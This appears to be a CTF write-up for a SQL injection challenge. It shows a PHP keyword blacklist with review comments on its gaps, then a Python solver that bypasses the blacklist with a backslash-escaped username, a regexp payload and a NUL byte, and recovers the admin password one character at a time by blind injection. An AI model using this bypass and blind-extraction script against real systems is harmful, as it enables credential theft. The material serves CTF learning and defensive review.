// Challenge hint: a case-insensitive blacklist of SQL keywords and characters.
// NOTE(review): how this pattern is applied is not shown here; presumably it is
// matched against the submitted form fields - confirm against the challenge source.
// The alternation has no entry for `regexp`, `||`, `\`, `"`, `;` or `^`, and the
// `%00` entry only matches the literal three-character text, not a decoded NUL byte.
// `\(\)` matches only an empty pair of parentheses, so `(column)` passes.
// A keyword blacklist like this is not a substitute for parameterized queries.
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";
If $_POST['passwd'] === admin's password,
Then you will get the flag;
import string
import requests
import time
from urllib import parse
# Solver for a CTF challenge instance: recovers the `passwd` value one
# character at a time. Each request submits a regexp prefix test in the
# `passwd` field and treats a response body containing b'welcome' as "the
# prefix matches".
# NOTE(review): the server-side query is not shown on this page; presumably
# the form fields are concatenated into the SQL text. Binding both fields as
# query parameters on the server would make this input inert, which the
# keyword blacklist does not.
url = 'http://b5774215-3cf9-41cb-b58d-afca88641fdd.node4.buuoj.cn:81/'
result = ''
# 26 lowercase letters + digits + a few symbols; be careful with wildcard
# characters.
alphabet = string.ascii_lowercase + string.digits + '_{}'
previous = 'tmp'
template = "||(passwd)regexp(\"^{}\");{}"
# A decoded NUL character; the blacklist only lists the literal text "%00".
nul_byte = parse.unquote('%00')

# Keep extending the prefix until a full pass over the alphabet adds nothing.
while result != previous:
    previous = result
    for candidate in alphabet:
        form = {
            "username": "\\",
            "passwd": template.format(result + candidate, nul_byte),
        }
        response = requests.post(url, data=form)
        if response.status_code == 503:
            # The pass is abandoned here. Nothing was appended, so
            # result == previous and the outer loop ends as well: the value
            # printed at the end may be incomplete after a 503.
            print('Too fast')
            break
        if b'welcome' in response.content:
            result += candidate
            print(result)
            break
        # Small pause between requests to stay under the rate limit.
        time.sleep(0.05)

print('[*]' + result)